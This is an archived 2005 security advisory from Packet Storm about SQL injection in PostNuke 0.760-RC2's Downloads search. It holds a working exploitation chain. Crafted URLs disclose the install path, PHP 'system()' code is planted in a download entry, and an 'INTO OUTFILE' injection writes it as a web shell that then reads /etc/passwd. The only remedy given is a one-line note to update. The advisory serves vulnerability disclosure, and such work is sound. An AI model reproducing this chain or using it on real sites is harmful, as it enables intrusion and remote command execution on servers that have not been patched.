exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

postnukeSQL0760-2.txt

postnukeSQL0760-2.txt
Posted Mar 1, 2005
Authored by Maksymilian Arciemowicz

PostNuke 0.760-RC2 is susceptible to addtional SQL injection attacks via the download module. Full detailed exploitation provided.

tags | exploit, sql injection
SHA-256 | ff228d5266f09d00f7ecb498ce8a743cc901a0789fac85c7059b716964116227

postnukeSQL0760-2.txt

Change Mirror Download


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PostNuke SQL Injection 0.760-RC2=>x cXIb8O3.3]

Author: cXIb8O3(Maksymilian Arciemowicz)
Date: 20.2.2005
from securityreason.com TEAM

- --- 0.Description ---

PostNuke: The Phoenix Release (0.750) and (0.760-RC2)

PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/


- --- 1. Sql Injection ---
This sql injection exist in modules/Downloads/dl-search.php on line 74 on function search()

Vulnerabilities code:
- -51-68---
if ($show!="") {
$downloadsresults = $show;
} else {
$show=$downloadsresults;
}
//$query = stripslashes($query);
$column = &$pntable['downloads_downloads_column'];
$sql = "SELECT $column[lid], $column[cid], $column[sid],
$column[title], $column[url], $column[description],
$column[date], $column[hits], $column[downloadratingsummary],
$column[totalvotes], $column[totalcomments],
$column[filesize], $column[version], $column[homepage]
FROM $pntable[downloads_downloads]
WHERE $column[title] LIKE '%".pnVarPrepForStore($query)."%'
OR $column[description] LIKE '%".pnVarPrepForStore($query)."%'
ORDER BY $pntable[downloads_downloads].$orderby";

$result = $dbconn->SelectLimit($sql, $downloadsresults, (int)$min);
- -51-68---

Error exist in varible $show.

Go to this url to view error:

http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&show=cXIb8O3

Error message :
- ---------------
Fatal error: Call to a member function PO_RecordCount() on a non-object in /www/PostNuke-0.760-RC2/html/modules/Downloads/dl-search.php on line 74
- ---------------

Because this sql injection is after ORDER BY.. we can not use UNION etc. But check this exploit.

Exploit
Check dir for PostNuke.

http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&show=cXIb8O3

Error message :
- ---------------
Fatal error: Call to a member function PO_RecordCount() on a non-object in /www/PostNuke-0.760-RC2/html/modules/Downloads/dl-search.php on line 74
- ---------------

For exemple prefix is /www/PostNuke-0.760-RC2/html/.

Now add new download and insert to "Description" or "Home page" php code. For example add:

- ---
<? system($_GET[cx]); ?>
- ---

And when this download exist in db, go to:


http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=[Program name]&show=10%20INTO%20OUTFILE%20'/[PATH]/pnTemp/Xanthia_cache/cXIb8O3.php'/*

and now for example..

http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3.php?cx=cat /etc/passwd

;]

- --- 2. Sql Error ---
This sql injection exist in modules/Downloads/dl-search.php on line 74 on function search()

Vulnerabilities code:
- -46-68---
if(isset($orderby)) {
$orderby = convertorderbyin($orderby);
} else {
$orderby = $pntable['downloads_downloads_column']['title'] . ' ASC';
}
if ($show!="") {
$downloadsresults = $show;
} else {
$show=$downloadsresults;
}
//$query = stripslashes($query);
$column = &$pntable['downloads_downloads_column'];
$sql = "SELECT $column[lid], $column[cid], $column[sid],
$column[title], $column[url], $column[description],
$column[date], $column[hits], $column[downloadratingsummary],
$column[totalvotes], $column[totalcomments],
$column[filesize], $column[version], $column[homepage]
FROM $pntable[downloads_downloads]
WHERE $column[title] LIKE '%".pnVarPrepForStore($query)."%'
OR $column[description] LIKE '%".pnVarPrepForStore($query)."%'
ORDER BY $pntable[downloads_downloads].$orderby";

$result = $dbconn->SelectLimit($sql, $downloadsresults, (int)$min);
- -46-68---

Error exist in:

- ---
$orderby = convertorderbyin($orderby);
- ---

and sql querty is:

- ---
SELECT pn_downloads_downloads.pn_lid, pn_downloads_downloads.pn_cid, pn_downloads_downloads.pn_sid, pn_downloads_downloads.pn_title, pn_downloads_downloads.pn_url, pn_downloads_downloads.pn_description, pn_downloads_downloads.pn_date, pn_downloads_downloads.pn_hits, pn_downloads_downloads.pn_ratingsummary, pn_downloads_downloads.pn_totalvotes, pn_downloads_downloads.pn_totalcomments, pn_downloads_downloads.pn_filesize, pn_downloads_downloads.pn_version, pn_downloads_downloads.pn_homepage FROM pn_downloads_downloads WHERE pn_downloads_downloads.pn_title LIKE '%%' OR pn_downloads_downloads.pn_description LIKE '%%' ORDER BY pn_downloads_downloads.
- ---

Url:
http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&orderby=


- --- 3. How to fix ---

Download the new version of the script or update.

- --- 4. Greets ---

sp3x

and for :(

- --- 5.Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
SECURITYREASON.COM TEAM

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCI32+znmvyJCR4zQRAtXhAKCuLzk7Q1sWCRBemwSOE+hEwFp9uQCfU2I3
rJzJSh3x+HbJfavy8FKfKYM=
=Mpoz
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close